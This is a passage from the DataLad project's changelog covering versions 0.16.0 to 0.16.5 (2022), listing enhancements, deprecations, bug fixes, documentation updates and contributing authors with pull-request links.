<https://github.com/yarikoptic>`__)\n- Prevent reentry of a runner instance\n `#6737 <https://github.com/datalad/datalad/pull/6737>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n\nAuthors: 2\n----------\n\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.5 (Wed Jun 08 2022)\n========================\n\n.. _bug-fix-7:\n\nBug Fix\n-------\n\n- BF: push to github - remove datalad-push-default-first config only in\n non-dry run to ensure we push default branch separately in next step\n `#6750 <https://github.com/datalad/datalad/pull/6750>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- In addition to default (system) ssh version, report configured ssh;\n fix ssh version parsing on Windows\n `#6729 <https://github.com/datalad/datalad/pull/6729>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\nAuthors: 1\n----------\n\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.4 (Thu Jun 02 2022)\n========================\n\n.. _bug-fix-8:\n\nBug Fix\n-------\n\n- BF(TST): RO operations - add test directory into git safe.directory\n `#6726 <https://github.com/datalad/datalad/pull/6726>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: fixup of docstring for skip_ssh\n `#6727 <https://github.com/datalad/datalad/pull/6727>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- DOC: Set language in Sphinx config to en\n `#6727 <https://github.com/datalad/datalad/pull/6727>`__\n (`@adswa <https://github.com/adswa>`__)\n- BF: Catch KeyErrors from unavailable WTF infos\n `#6712 <https://github.com/datalad/datalad/pull/6712>`__\n (`@adswa <https://github.com/adswa>`__)\n- Add annex.private to ephemeral clones. That would make git-annex not\n assign shared (in git-annex branch) annex uuid.\n `#6702 <https://github.com/datalad/datalad/pull/6702>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__\n `@adswa <https://github.com/adswa>`__)\n- BF: require argcomplete version at least 1.12.3 to test/operate\n correctly `#6693 <https://github.com/datalad/datalad/pull/6693>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Replace Zenodo DOI with JOSS for due credit\n `#6725 <https://github.com/datalad/datalad/pull/6725>`__\n (`@adswa <https://github.com/adswa>`__)\n\n.. _authors-3-4:\n\nAuthors: 3\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.3 (Thu May 12 2022)\n========================\n\n.. _bug-fix-9:\n\nBug Fix\n-------\n\n- No change for a PR to trigger release\n `#6692 <https://github.com/datalad/datalad/pull/6692>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Sanitize keys before checking content availability to ensure correct\n value for keys with URL or custom backend\n `#6665 <https://github.com/datalad/datalad/pull/6665>`__\n (`@adswa <https://github.com/adswa>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Change a key-value pair in drop result record\n `#6625 <https://github.com/datalad/datalad/pull/6625>`__\n (`@mslw <https://github.com/mslw>`__)\n- Link docs of datalad-next\n `#6677 <https://github.com/datalad/datalad/pull/6677>`__\n (`@mih <https://github.com/mih>`__)\n- Fix ``GitRepo.get_branch_commits_()`` to handle branch names\n conflicts with paths\n `#6661 <https://github.com/datalad/datalad/pull/6661>`__\n (`@mih <https://github.com/mih>`__)\n- OPT: AnnexJsonProtocol - avoid dragging possibly long data around\n `#6660 <https://github.com/datalad/datalad/pull/6660>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- Remove two too prominent create() INFO log message that duplicate\n DEBUG log and harmonize some other log messages\n `#6638 <https://github.com/datalad/datalad/pull/6638>`__\n (`@mih <https://github.com/mih>`__\n `@yarikoptic <https://github.com/yarikoptic>`__)\n- Remove unsupported parameter create_sibling_ria(existing=None)\n `#6637 <https://github.com/datalad/datalad/pull/6637>`__\n (`@mih <https://github.com/mih>`__)\n- Add released plugin to .autorc to annotate PRs on when released\n `#6639 <https://github.com/datalad/datalad/pull/6639>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\nAuthors: 4\n----------\n\n- Adina Wagner (`@adswa <https://github.com/adswa>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Micha Szczepanik (`@mslw <https://github.com/mslw>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.2 (Thu Apr 21 2022)\n========================\n\n.. _bug-fix-10:\n\nBug Fix\n-------\n\n- Demote (to level 1 from DEBUG) and speed-up API doc logging\n (parseParameters)\n `#6635 <https://github.com/datalad/datalad/pull/6635>`__\n (`@mih <https://github.com/mih>`__)\n- Factor out actual data transfer in push\n `#6618 <https://github.com/datalad/datalad/pull/6618>`__\n (`@christian-monch <https://github.com/christian-monch>`__)\n- ENH: include version of datalad in tests teardown Versions: report\n `#6628 <https://github.com/datalad/datalad/pull/6628>`__\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n- MNT: Require importlib-metadata >=3.6 for Python < 3.10 for\n entry_points taking kwargs\n `#6631 <https://github.com/datalad/datalad/pull/6631>`__\n (`@effigies <https://github.com/effigies>`__)\n- Factor out credential handling of create-sibling-ghlike\n `#6627 <https://github.com/datalad/datalad/pull/6627>`__\n (`@mih <https://github.com/mih>`__)\n- BF: Fix wrong key name of annex’ JSON records\n `#6624 <https://github.com/datalad/datalad/pull/6624>`__\n (`@bpoldrack <https://github.com/bpoldrack>`__)\n\n.. _pushed-to-maint-2:\n\nPushed to ``maint``\n-------------------\n\n- Fix typo in changelog (`@mih <https://github.com/mih>`__)\n- [ci skip] minor typo fix\n (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n.. _authors-5-2:\n\nAuthors: 5\n----------\n\n- Benjamin Poldrack (`@bpoldrack <https://github.com/bpoldrack>`__)\n- Chris Markiewicz (`@effigies <https://github.com/effigies>`__)\n- Christian Mnch\n (`@christian-monch <https://github.com/christian-monch>`__)\n- Michael Hanke (`@mih <https://github.com/mih>`__)\n- Yaroslav Halchenko (`@yarikoptic <https://github.com/yarikoptic>`__)\n\n--------------\n\n0.16.1 (Fr Apr 8 2022) – April Fools’ Release\n=============================================\n\n- Fixes forgotten changelog in docs\n\n0.16.0 (Fr Apr 8 2022) – Spring cleaning!\n=========================================\n\n.. _enhancements-and-new-features-4:\n\nEnhancements and new features\n-----------------------------\n\n- A new set of ``create-sibling-*`` commands reimplements the\n GitHub-platform support of ``create-sibling-github`` and adds support\n to interface three new platforms in a unified fashion: GIN\n (``create-sibling-gin``), GOGS (``create-sibling-gogs``), and Gitea\n (``create-sibling-gitea``). All commands rely on personal access\n tokens only for authentication, allow for specifying one of several\n stored credentials via a uniform ``--credential`` parameter, and\n support a uniform ``--dry-run`` mode for testing without network.\n `#5949 <https://github.com/datalad/datalad/pull/5949>`__ (by @mih)\n- ``create-sibling-github`` now has supports direct specification of\n organization repositories via a ``[<org>/]repo``\\ syntax\n `#5949 <https://github.com/datalad/datalad/pull/5949>`__ (by @mih)\n- ``create-sibling-gitlab`` gained a ``--dry-run`` parameter to match\n the corresponding parameters in\n ``create-sibling-{github,gin,gogs,gitea}``\n `#6013 <https://github.com/datalad/datalad/pull/6013>`__ (by @adswa)\n- The ``--new-store-ok`` parameter of ``create-sibling-ria`` only\n creates new RIA stores when explicitly provided\n `#6045 <https://github.com/datalad/datalad/pull/6045>`__ (by @adswa)\n- The default performance of ``status()`` and ``diff()`` commands is\n improved by up to 700% removing file-type evaluation as a default\n operation, and simplifying the type reporting rule\n `#6097 <https://github.com/datalad/datalad/pull/6097>`__ (by @mih)\n- ``drop()`` and ``remove()`` were reimplemented in full,\n conceptualized as the antagonist commands to ``get()`` and\n ``clone()``. A new, harmonized set of parameters\n (``--what ['filecontent', 'allkeys', 'datasets', 'all']``,\n ``--reckless ['modification', 'availability', 'undead', 'kill']``)\n simplifies their API. Both commands include additional safeguards.\n ``uninstall`` is replaced with a thin shim command around ``drop()``\n `#6111 <https://github.com/datalad/datalad/pull/6111>`__ (by @mih)\n- ``add_archive_content()`` was refactored into a dataset method and\n gained progress bars\n `#6105 <https://github.com/datalad/datalad/pull/6105>`__ (by @adswa)\n- The ``datalad`` and ``datalad-archives`` special remotes have been\n reimplemented based on ``AnnexRemote``\n `#6165 <https://github.com/datalad/datalad/pull/6165>`__ (by @mih)\n- The ``result_renderer()`` semantics were decomplexified and\n harmonized. The previous ``default`` result renderer was renamed to\n ``generic``. `#6174 <https://github.com/datalad/datalad/pull/6174>`__\n (by @mih)\n- ``get_status_dict`` learned to include exit codes in the case of\n CommandErrors\n `#5642 <https://github.com/datalad/datalad/pull/5642>`__ (by\n @yarikoptic)\n- ``datalad clone`` can now pass options to ``git-clone``, adding\n support for cloning specific tags or branches, naming siblings other\n names than ``origin``, and exposing ``git clone``\\ ’s optimization\n arguments `#6218 <https://github.com/datalad/datalad/pull/6218>`__\n (by @kyleam and @mih)\n- Inactive BatchedCommands are cleaned up\n `#6206 <https://github.com/datalad/datalad/pull/6206>`__ (by\n @jwodder)\n- ``export-archive-ora`` learned to filter files exported to 7z\n archives `#6234 <https://github.com/datalad/datalad/pull/6234>`__ (by\n @mih and @bpinsard)\n- ``datalad run`` learned to glob recursively\n `#6262 <https://github.com/datalad/datalad/pull/6262>`__ (by @AKSoo)\n- The ORA remote learned to recover from interrupted uploads\n `#6267 <https://github.com/datalad/datalad/pull/6267>`__ (by @mih)\n- A new threaded runner with support for timeouts and generator-based\n subprocess communication is introduced and used in ``BatchedCommand``\n and ``AnnexRepo``\n `#6244 <https://github.com/datalad/datalad/pull/6244>`__ (by\n @christian-monch)\n- A new switch allows to enable librarymode and queries for the\n effective API in use\n `#6213 <https://github.com/datalad/datalad/pull/6213>`__ (by @mih)\n- ``run`` and ``rerun`` now support parallel jobs via ``--jobs``\n `#6279 <https://github.com/datalad/datalad/pull/6279>`__ (by @AKSoo)\n- A new ``foreach-dataset`` plumbing command allows to run commands on\n each (sub)dataset, similar to ``git submodule foreach``\n `#5517 <https://github.com/datalad/datalad/pull/5517>`__ (by\n @yarikoptic)\n- The ``dataset`` parameter is not restricted to only locally\n resolvable file-URLs anymore\n `#6276 <https://github.com/datalad/datalad/pull/6276>`__ (by\n @christian-monch)\n- DataLad’s credential system is now able to query ``git-credential``\n by specifying credential type ``git`` in the respective provider\n configuration\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- DataLad now comes with a git credential helper\n ``git-credential-datalad`` allowing Git to query DataLad’s credential\n system `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack and @mih)\n- The new runner now allows for multiple threads\n `#6371 <https://github.com/datalad/datalad/pull/6371>`__ (by\n @christian-monch)\n- A new configurationcommand provides an interface to manipulate and\n query the DataLad configuration.\n `#6306 <https://github.com/datalad/datalad/pull/6306>`__ (by @mih)\n\n - Unlike the global Python-only datalad.cfg or dataset-specific\n Dataset.config configuration managers, this command offers a\n uniform API across the Python and the command line interfaces.\n - This command was previously available in the mihextras extension\n as x-configuration, and has been merged into the core package in\n an improved version.\n `#5489 <https://github.com/datalad/datalad/pull/5489>`__ (by @mih)\n - In its default dump mode, the command provides an annotated list\n of the effective configuration after considering all configuration\n sources, including hints on additional configuration settings and\n their supported values.\n\n- The command line interface help-reporting has been sped up by ~20%\n `#6370 <https://github.com/datalad/datalad/pull/6370>`__\n `#6378 <https://github.com/datalad/datalad/pull/6378>`__ (by @mih)\n- ``ConfigManager`` now supports reading committed dataset\n configuration in bare repositories. Analog to reading\n ``.datalad/config`` from a worktree, ``blob:HEAD:.datalad/config`` is\n read (e.g., the config committed in the default branch). The support\n includes \\`\\ ``reload()`` change detection using the gitsha of this\n file. The behavior for non-bare repositories is unchanged.\n `#6332 <https://github.com/datalad/datalad/pull/6332>`__ (by @mih)\n- The CLI help generation has been sped up, and now also supports the\n completion of parameter values for a fixed set of choices\n `#6415 <https://github.com/datalad/datalad/pull/6415>`__ (by @mih)\n- Individual command implementations can now declare a specific\n “on-failure” behavior by defining ``Interface.on_failure`` to be one\n of the supported modes (stop, continue, ignore). Previously, such a\n modification was only possible on a per-call basis.\n `#6430 <https://github.com/datalad/datalad/pull/6430>`__ (by @mih)\n- The ``run`` command changed its default “on-failure” behavior from\n ``continue`` to ``stop``. This change prevents the execution of a\n command in case a declared input can not be obtained. Previously,\n only an error result was yielded (and run eventually yielded a\n non-zero exit code or an ``IncompleteResultsException``), but the\n execution proceeded and potentially saved a dataset modification\n despite incomplete inputs, in case the command succeeded. This\n previous default behavior can still be achieved by calling run with\n the equivalent of ``--on-failure continue``\n `#6430 <https://github.com/datalad/datalad/pull/6430>`__ (by @mih)\n- The \\`\\ ``run`` command now provides readily executable, API-specific\n instructions how to save the results of a command execution that\n failed expectedly\n `#6434 <https://github.com/datalad/datalad/pull/6434>`__ (by @mih)\n- ``create-sibling --since=^`` mode will now be as fast as\n ``push --since=^`` to figure out for which subdatasets to create\n siblings `#6436 <https://github.com/datalad/datalad/pull/6436>`__ (by\n @yarikoptic)\n- When file names contain illegal characters or reserved file names\n that are incompatible with Windows systems a configurable check for\n ``save`` (``datalad.save.windows-compat-warning``) will either do\n nothing (``none``), emit an incompatibility warning (``warning``,\n default), or cause ``save`` to error (``error``)\n `#6291 <https://github.com/datalad/datalad/pull/6291>`__ (by @adswa)\n- Improve responsiveness of ``datalad drop`` in datasets with a large\n annex. `#6580 <https://github.com/datalad/datalad/pull/6580>`__ (by\n @christian-monch)\n- ``save`` code might operate faster on heavy file trees\n `#6581 <https://github.com/datalad/datalad/pull/6581>`__ (by\n @yarikoptic)\n- Removed a per-file overhead cost for ORA when downloading over HTTP\n `#6609 <https://github.com/datalad/datalad/pull/6609>`__ (by\n @bpoldrack)\n- A new module ``datalad.support.extensions`` offers the utility\n functions ``register_config()`` and ``has_config()`` that allow\n extension developers to announce additional configuration items to\n the central configuration management.\n `#6601 <https://github.com/datalad/datalad/pull/6601>`__ (by @mih)\n- When operating in a dirty dataset, ``export-to-figshare`` now yields\n and impossible result instead of raising a RunTimeError\n `#6543 <https://github.com/datalad/datalad/pull/6543>`__ (by @adswa)\n- Loading DataLad extension packages has been sped-up leading to\n between 2x and 4x faster run times for loading individual extensions\n and reporting help output across all installed extensions.\n `#6591 <https://github.com/datalad/datalad/pull/6591>`__ (by @mih)\n- Introduces the configuration key ``datalad.ssh.executable``. This key\n allows specifying an ssh-client executable that should be used by\n datalad to establish ssh-connections. The default value is ``ssh``\n unless on a Windows system where ``$WINDIR\\System32\\OpenSSH\\ssh.exe``\n exists. In this case, the value defaults to\n ``$WINDIR\\System32\\OpenSSH\\ssh.exe``.\n `#6553 <https://github.com/datalad/datalad/pull/6553>`__ (by\n @christian-monch)\n- create-sibling should perform much faster in case of ``--since``\n specification since would consider only submodules related to the\n changes since that point.\n `#6528 <https://github.com/datalad/datalad/pull/6528>`__ (by\n @yarikoptic)\n- A new configuration setting\n ``datalad.ssh.try-use-annex-bundled-git=yes|no`` can be used to\n influence the default remote git-annex bundle sensing for SSH\n connections. This was previously done unconditionally for any call to\n ``datalad sshrun`` (which is also used for any SSH-related Git or\n git-annex functionality triggered by DataLad-internal processing) and\n could incur a substantial per-call runtime cost. The new default is\n to not perform this sensing, because for, e.g., use as\n GIT_SSH_COMMAND there is no expectation to have a remote git-annex\n installation, and even with an existing git-annex/Git bundle on the\n remote, it is not certain that the bundled Git version is to be\n preferred over any other Git installation in a user’s PATH.\n `#6533 <https://github.com/datalad/datalad/pull/6533>`__ (by @mih)\n- ``run`` now yields a result record immediately after executing a\n command. This allows callers to use the standard\n ``--on-failure switch`` to control whether dataset modifications will\n be saved for a command that exited with an error.\n `#6447 <https://github.com/datalad/datalad/pull/6447>`__ (by @mih)\n\n.. _deprecations-and-removals-1:\n\nDeprecations and removals\n-------------------------\n\n- The ``--pbs-runner`` commandline option (deprecated in ``0.15.0``)\n was removed `#5981 <https://github.com/datalad/datalad/pull/5981>`__\n (by @mih)\n- The dependency to PyGithub was dropped\n `#5949 <https://github.com/datalad/datalad/pull/5949>`__ (by @mih)\n- ``create-sibling-github``\\ ’s credential handling was trimmed down to\n only allow personal access tokens, because GitHub discontinued\n user/password based authentication\n `#5949 <https://github.com/datalad/datalad/pull/5949>`__ (by @mih)\n- ``create-sibling-gitlab``\\ ’s ``--dryrun`` parameter is deprecated in\n favor or ``--dry-run``\n `#6013 <https://github.com/datalad/datalad/pull/6013>`__ (by @adswa)\n- Internal obsolete ``Gitrepo.*_submodule`` methods were moved to\n ``datalad-deprecated``\n `#6010 <https://github.com/datalad/datalad/pull/6010>`__ (by @mih)\n- ``datalad/support/versions.py`` is unused in DataLad core and removed\n `#6115 <https://github.com/datalad/datalad/pull/6115>`__ (by\n @yarikoptic)\n- Support for the undocumented ``datalad.api.result-renderer`` config\n setting has been dropped\n `#6174 <https://github.com/datalad/datalad/pull/6174>`__ (by @mih)\n- Undocumented use of ``result_renderer=None`` is replaced with\n ``result_renderer='disabled'``\n `#6174 <https://github.com/datalad/datalad/pull/6174>`__ (by @mih)\n- ``remove``\\ ’s ``--recursive`` argument has been deprecated\n `#6257 <https://github.com/datalad/datalad/pull/6257>`__ (by @mih)\n- The use of the internal helper ``get_repo_instance()`` is\n discontinued and deprecated\n `#6268 <https://github.com/datalad/datalad/pull/6268>`__ (by @mih)\n- Support for Python 3.6 has been dropped\n (`#6286 <https://github.com/datalad/datalad/pull/6286>`__ (by\n @christian-monch) and\n `#6364 <https://github.com/datalad/datalad/pull/6364>`__ (by\n @yarikoptic))\n- All but one Singularity recipe flavor have been removed due to their\n limited value with the end of life of Singularity Hub\n `#6303 <https://github.com/datalad/datalad/pull/6303>`__ (by @mih)\n- All code in module datalad.cmdline was (re)moved, only\n datalad.cmdline.helpers.get_repo_instanceis kept for a deprecation\n period (by @mih)\n- ``datalad.interface.common_opts.eval_default`` has been deprecated.\n All (command-specific) defaults for common interface parameters can\n be read from ``Interface`` class attributes\n (`#6391 <https://github.com/datalad/datalad/pull/6391>`__ (by @mih)\n- Remove unused and untested ``datalad.interface.utils`` helpers\n ``cls2cmdlinename`` and ``path_is_under``\n `#6392 <https://github.com/datalad/datalad/pull/6392>`__ (by @mih)\n- An unused code path for result rendering was removed from the CLI\n ``main()`` `#6394 <https://github.com/datalad/datalad/pull/6394>`__\n (by @mih)\n- ``create-sibling`` will require now ``\"^\"`` instead of an empty\n string for since option\n `#6436 <https://github.com/datalad/datalad/pull/6436>`__ (by\n @yarikoptic)\n- ``run`` no longer raises a ``CommandError`` exception for failed\n commands, but yields an ``error`` result that includes a superset of\n the information provided by the exception. This change impacts\n command line usage insofar as the exit code of the underlying command\n is no longer relayed as the exit code of the ``run`` command call –\n although ``run`` continues to exit with a non-zero exit code in case\n of an error. For Python API users, the nature of the raised exception\n changes from ``CommandError`` to ``IncompleteResultsError``, and the\n exception handling is now configurable using the standard\n ``on_failure`` command argument. The original ``CommandError``\n exception remains available via the ``exception`` property of the\n newly introduced result record for the command execution, and this\n result record is available via ``IncompleteResultsError.failed``, if\n such an exception is raised.\n `#6447 <https://github.com/datalad/datalad/pull/6447>`__ (by @mih)\n- Custom cast helpers were removed from datalad core and migrated to a\n standalone repository https://github.com/datalad/screencaster\n `#6516 <https://github.com/datalad/datalad/pull/6516>`__ (by @adswa)\n- The ``bundled`` parameter of ``get_connection_hash()`` is now ignored\n and will be removed with a future release.\n `#6532 <https://github.com/datalad/datalad/pull/6532>`__ (by @mih)\n- ``BaseDownloader.fetch()`` is logging download attempts on DEBUG\n (previously INFO) level to avoid polluting output of higher-level\n commands. `#6564 <https://github.com/datalad/datalad/pull/6564>`__\n (by @mih)\n\n.. _bug-fixes-15:\n\nBug Fixes\n---------\n\n- ``create-sibling-gitlab`` erroneously overwrote existing sibling\n configurations. A safeguard will now prevent overwriting and exit\n with an error result\n `#6015 <https://github.com/datalad/datalad/pull/6015>`__ (by @adswa)\n- ``create-sibling-gogs`` now relays HTTP500 errors, such as “no space\n left on device”\n `#6019 <https://github.com/datalad/datalad/pull/6019>`__ (by @mih)\n- ``annotate_paths()`` is removed from the last parts of code base that\n still contained it\n `#6128 <https://github.com/datalad/datalad/pull/6128>`__ (by @mih)\n- ``add_archive_content()`` doesn’t crash with ``--key`` and\n ``--use-current-dir`` anymore\n `#6105 <https://github.com/datalad/datalad/pull/6105>`__ (by @adswa)\n- ``run-procedure`` now returns an error result when a non-existent\n procedure name is specified\n `#6143 <https://github.com/datalad/datalad/pull/6143>`__ (by @mslw)\n- A fix for a silent failure of ``download-url --archive`` when\n extracting the archive\n `#6172 <https://github.com/datalad/datalad/pull/6172>`__ (by @adswa)\n- Uninitialized AnnexRepos can now be dropped\n `#6183 <https://github.com/datalad/datalad/pull/6183>`__ (by @mih)\n- Instead of raising an error, the formatters tests are skipped when\n the ``formatters`` module is not found\n `#6212 <https://github.com/datalad/datalad/pull/6212>`__ (by @adswa)\n- ``create-sibling-gin`` does not disable git-annex availability on Gin\n remotes anymore\n `#6230 <https://github.com/datalad/datalad/pull/6230>`__ (by @mih)\n- The ORA special remote messaging is fixed to not break the special\n remote protocol anymore and to better relay messages from exceptions\n to communicate underlying causes\n `#6242 <https://github.com/datalad/datalad/pull/6242>`__ (by @mih)\n- A ``keyring.delete()`` call was fixed to not call an uninitialized\n private attribute anymore\n `#6253 <https://github.com/datalad/datalad/pull/6253>`__ (by\n @bpoldrack)\n- An erroneous placement of result keyword arguments into a\n ``format()`` method instead of ``get_status_dict()`` of\n ``create-sibling-ria`` has been fixed\n `#6256 <https://github.com/datalad/datalad/pull/6256>`__ (by @adswa)\n- ``status``, ``run-procedure``, and ``metadata`` are no longer\n swallowing result-related messages in renderers\n `#6280 <https://github.com/datalad/datalad/pull/6280>`__ (by @mih)\n- ``uninstall`` now recommends the new ``--reckless`` parameter instead\n of the deprecated ``--nocheck`` parameter when reporting hints\n `#6277 <https://github.com/datalad/datalad/pull/6277>`__ (by @adswa)\n- ``download-url`` learned to handle Pathobjects\n `#6317 <https://github.com/datalad/datalad/pull/6317>`__ (by @adswa)\n- Restore default result rendering behavior broken by Key interface\n documentation\n `#6394 <https://github.com/datalad/datalad/pull/6394>`__ (by @mih)\n- Fix a broken check for file presence in the ``ConfigManager`` that\n could have caused a crash in rare cases when a config file is removed\n during the process runtime\n `#6332 <https://github.com/datalad/datalad/pull/6332>`__ (by @mih)\n \\`- ``ConfigManager.get_from_source()`` now accesses the correct\n information when using the documented ``source='local'``, avoiding a\n crash `#6332 <https://github.com/datalad/datalad/pull/6332>`__ (by\n @mih)\n- ``run`` no longer let’s the internal call to ``save`` render its\n results unconditionally, but the parameterization f run determines\n the effective rendering format.\n `#6421 <https://github.com/datalad/datalad/pull/6421>`__ (by @mih)\n- Remove an unnecessary and misleading warning from the runner\n `#6425 <https://github.com/datalad/datalad/pull/6425>`__ (by\n @christian-monch)\n- A number of commands stopped to double-report results\n `#6446 <https://github.com/datalad/datalad/pull/6446>`__ (by @adswa)\n- ``create-sibling-ria`` no longer creates an ``annex/objects``\n directory in-store, when called with ``--no-storage-sibling``.\n `#6495 <https://github.com/datalad/datalad/pull/6495>`__ (by\n @bpoldrack )\n- Improve error message when an invalid URL is given to ``clone``.\n `#6500 <https://github.com/datalad/datalad/pull/6500>`__ (by @mih)\n- DataLad declares a minimum version dependency to ``keyring >= 20.0``\n to ensure that token-based authentication can be used.\n `#6515 <https://github.com/datalad/datalad/pull/6515>`__ (by @adswa)\n- ORA special remote tries to obtain permissions when dropping a key\n from a RIA store rather than just failing. Thus having the same\n permissions in the store’s object trees as one directly managed by\n git-annex would have, works just fine now.\n `#6493 <https://github.com/datalad/datalad/pull/6493>`__ (by\n @bpoldrack )\n- ``require_dataset()`` now uniformly raises ``NoDatasetFound`` when no\n dataset was found. Implementations that catch the previously\n documented ``InsufficientArgumentsError`` or the actually raised\n ``ValueError`` will continue to work, because ``NoDatasetFound`` is\n derived from both types.\n `#6521 <https://github.com/datalad/datalad/pull/6521>`__ (by @mih)\n- Keyboard-interactive authentication is now possibly with\n non-multiplexed SSH connections (i.e., when no connection sharing is\n possible, due to lack of socket support, for example on Windows).\n Previously, it was disabled forcefully by DataLad for no valid\n reason. `#6537 <https://github.com/datalad/datalad/pull/6537>`__ (by\n @mih)\n- Remove duplicate exception type in reporting of top-level CLI\n exception handler.\n `#6563 <https://github.com/datalad/datalad/pull/6563>`__ (by @mih)\n- Fixes DataLad’s parsing of git-annex’ reporting on unknown paths\n depending on its version and the value of the ``annex.skipunknown``\n config. `#6550 <https://github.com/datalad/datalad/pull/6550>`__ (by\n @bpoldrack)\n- Fix ORA special remote not properly reporting on HTTP failures.\n `#6535 <https://github.com/datalad/datalad/pull/6535>`__ (by\n @bpoldrack)\n- ORA special remote didn’t show per-file progress bars when\n downloading over HTTP\n `#6609 <https://github.com/datalad/datalad/pull/6609>`__ (by\n @bpoldrack)\n- ``save`` now can commit the change where file becomes a directory\n with a staged for commit file.\n `#6581 <https://github.com/datalad/datalad/pull/6581>`__ (by\n @yarikoptic)\n- ``create-sibling`` will no longer create siblings for not yet saved\n new subdatasets, and will now create sub-datasets nested in the\n subdatasets which did not yet have those siblings.\n `#6603 <https://github.com/datalad/datalad/pull/6603>`__ (by\n @yarikoptic)\n\n.. _documentation-10:\n\nDocumentation\n-------------\n\n- A new design document sheds light on result records\n `#6167 <https://github.com/datalad/datalad/pull/6167>`__ (by @mih)\n- The ``disabled`` result renderer mode is documented\n `#6174 <https://github.com/datalad/datalad/pull/6174>`__ (by @mih)\n- A new design document sheds light on the ``datalad`` and\n ``datalad-archives`` special remotes\n `#6181 <https://github.com/datalad/datalad/pull/6181>`__ (by @mih)\n- A new design document sheds light on ``BatchedCommand`` and\n ``BatchedAnnex``\n `#6203 <https://github.com/datalad/datalad/pull/6203>`__ (by\n @christian-monch)\n- A new design document sheds light on standard parameters\n `#6214 <https://github.com/datalad/datalad/pull/6214>`__ (by @adswa)\n- The DataLad project adopted the Contributor Covenant COC v2.1\n `#6236 <https://github.com/datalad/datalad/pull/6236>`__ (by @adswa)\n- Docstrings learned to include Sphinx’ “version added” and\n “deprecated” directives\n `#6249 <https://github.com/datalad/datalad/pull/6249>`__ (by @mih)\n- A design document sheds light on basic docstring handling and\n formatting `#6249 <https://github.com/datalad/datalad/pull/6249>`__\n (by @mih)\n- A new design document sheds light on position versus keyword\n parameter usage\n `#6261 <https://github.com/datalad/datalad/pull/6261>`__ (by\n @yarikoptic)\n- ``create-sibling-gin``\\ ’s examples have been improved to suggest\n ``push`` as an additional step to ensure proper configuration\n `#6289 <https://github.com/datalad/datalad/pull/6289>`__ (by @mslw)\n- A new `document <http://docs.datalad.org/credentials.html>`__\n describes the credential system from a user’s perspective\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- Enhance the `design\n document <http://docs.datalad.org/design/credentials.html>`__ on\n DataLad’s credential system\n `#5796 <https://github.com/datalad/datalad/pull/5796>`__ (by\n @bpoldrack)\n- The documentation of the configuration command now details all\n locations DataLad is reading configuration items from, and their\n respective rules of precedence\n `#6306 <https://github.com/datalad/datalad/pull/6306>`__ (by @mih)\n- API docs for datalad.interface.base are now included in the\n documentation\n `#6378 <https://github.com/datalad/datalad/pull/6378>`__ (by @mih)\n- A new design document is provided that describes the basics of the\n command line interface implementation\n `#6382 <https://github.com/datalad/datalad/pull/6382>`__ (by @mih)\n- The \\`\\ ``datalad.interface.base.Interface`` class, the basis of all\n DataLad command implementations, has been extensively documented to\n provide an overview of basic principles and customization\n possibilities\n `#6391 <https://github.com/datalad/datalad/pull/6391>`__ (by @mih)\n- ``--since=^`` mode of operation of ``create-sibling`` is documented\n now `#6436 <https://github.com/datalad/datalad/pull/6436>`__ (by\n @yarikoptic)\n\n.. _internal-12:\n\nInternal\n--------\n\n- The internal ``status()`` helper was equipped with docstrings and\n promotes “breadth-first” reporting with a new parameter\n ``reporting_order``\n `#6006 <https://github.com/datalad/datalad/pull/6006>`__ (by @mih)\n- ``AnnexRepo.get_file_annexinfo()`` is introduced for more convenient\n queries for single files and replaces a now deprecated\n ``AnnexRepo.get_file_key()`` to receive information with fewer calls\n to Git `#6104 <https://github.com/datalad/datalad/pull/6104>`__ (by\n @mih)\n- A new ``get_paths_by_ds()`` helper exposes ``status``\\ ’ path\n normalization and sorting\n `#6110 <https://github.com/datalad/datalad/pull/6110>`__ (by @mih)\n- ``status`` is optimized with a cache for dataset roots\n `#6137 <https://github.com/datalad/datalad/pull/6137>`__ (by\n @yarikoptic)\n- The internal ``get_func_args_doc()`` helper with Python 2 is removed\n from DataLad core\n `#6175 <https://github.com/datalad/datalad/pull/6175>`__ (by\n @yarikoptic)\n- Further restructuring of the source tree to better reflect the\n internal dependency structure of the code: ``AddArchiveContent`` is\n moved from ``datalad/interface`` to ``datalad/local``\n (`#6188 <https://github.com/datalad/datalad/pull/6188>`__ (by @mih)),\n ``Clean`` is moved from ``datalad/interface`` to ``datalad/local``\n (`#6191 <https://github.com/datalad/datalad/pull/6191>`__ (by @mih)),\n ``Unlock`` is moved from ``datalad/interface`` to ``datalad/local``\n (`#6192 <https://github.com/datalad/datalad/pull/6192>`__ (by @mih)),\n ``DownloadURL`` is moved from ``datalad/interface`` to\n ``datalad/local``\n (`#6217 <https://github.com/datalad/datalad/pull/6217>`__ (by @mih)),\n ``Rerun`` is moved from ``datalad/interface`` to ``datalad/local``\n (`#6220 <https://github.com/datalad/datalad/pull/6220>`__ (by @mih)),\n ``RunProcedure`` is moved from ``datalad/interface`` to\n ``datalad/local``\n 